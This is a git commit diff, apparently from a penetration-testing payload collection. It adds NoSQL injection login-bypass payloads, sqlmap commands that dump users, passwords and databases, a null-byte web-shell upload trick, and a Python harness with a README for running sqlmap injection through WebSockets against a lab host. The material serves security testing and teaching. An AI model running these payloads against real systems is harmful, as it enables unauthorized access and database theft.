Web socket + title capitalization

2024-12-13 14:52:53 +00:00 · 2019-03-07 00:03:25 +01:00 · 2019-03-07 00:03:25 +01:00 · ee334f981e
commit ee334f981e
parent ef65f36902
8 changed files with 118 additions and 4 deletions
--- a/injection/README.md
+++ b/injection/README.md
@ -11,9 +11,10 @@ in URL
 username[$ne]=toto&password[$ne]=toto
 in JSON
-{"username": {"$ne": null}, "password": {"$ne": null} }
+{"username": {"$ne": null}, "password": {"$ne": null}}
-{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
+{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
-{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
+{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
 {"username": {"$gt":""}, "password": {"$gt":""}}
 ```
 Extract length information
@ -40,6 +41,13 @@ in JSON
 {"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
 ```
 Extract data with "in"
 ````json
 {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
 ```
 ## Blind NoSQL
 ```python
--- a/injection/README.md
+++ b/injection/README.md
@ -117,6 +117,12 @@ transformed into U+0027 APOSTROPHE (')
 sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
 ```
 ### Load a request file and use mobile user-agent
 ```powershell
 sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1
 ```
 ### Custom injection in UserAgent/Header/Referer/Cookie
 ```powershell
--- a/files/README.md
+++ b/files/README.md
@ -31,7 +31,7 @@ Double extensions
 ### Upload tricks
- Null byte (eg: shell.php%00.gif, shell.php%00.png)
+- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
 ### Picture upload with LFI
--- a/Sockets/Files/ws-harness.py
+++ b/Sockets/Files/ws-harness.py
@ -0,0 +1,63 @@
 #!/usr/bin/python
 import socket,ssl
 from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
 from websocket import create_connection, WebSocket
 from urlparse import parse_qs
 import argparse
 import os
 LOOP_BACK_PORT_NUMBER = 8000
 def FuzzWebSocket(fuzz_value):
    print fuzz_value
    ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
    result =  ws.recv()
    return result
 def LoadMessage(file):
    file_contents = ""
    try:
        if os.path.isfile(file):
            f = open(file,'r')
            file_contents = f.read()
            f.close()
    except:
        print ("Error reading file: %s" % file)
        exit()
    return file_contents
 class myWebServer(BaseHTTPRequestHandler):
    #Handler for the GET requests
    def do_GET(self):
        qs = parse_qs(self.path[2:])
        fuzz_value = qs['fuzz']
        result = FuzzWebSocket(fuzz_value)
        self.send_response(200)
        self.send_header('Content-type','text/html')
        self.end_headers()
        self.wfile.write(result)
        return
 parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
 parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True)
 parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True)
 args = parser.parse_args()
 ws_message = LoadMessage(args.message)
 ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080)
 try:
    #Create a web server and define the handler to manage the
    #incoming request
    server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
    print 'Started httpserver on port ' , LOOP_BACK_PORT_NUMBER
    #Wait forever for incoming http requests
    server.serve_forever()
 except KeyboardInterrupt:
    print '^C received, shutting down the web server'
    server.socket.close()
    ws.close()
--- a/Sockets/Images/WebsocketHarness.jpg
+++ b/Sockets/Images/WebsocketHarness.jpg
--- a/Sockets/Images/sqlmap.png
+++ b/Sockets/Images/sqlmap.png
--- a/Sockets/Images/websocket-harness-start.png
+++ b/Sockets/Images/websocket-harness-start.png
--- a/Sockets/README.md
+++ b/Sockets/README.md
@ -0,0 +1,37 @@
 # Web Sockets Attacks
 > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
 Tools:
 - [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
 ## Summary
 * [Using ws-harness.py](#using-ws-harness-py)
 ## Using ws-harness.py
 Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
 ```powershell
 python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
 ```
 The content of the message should contains the **[FUZZ]** keyword.
 ```json
 {"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
 ```
 Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
 ```python
 sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
 ```
 ## References
 - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
 - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)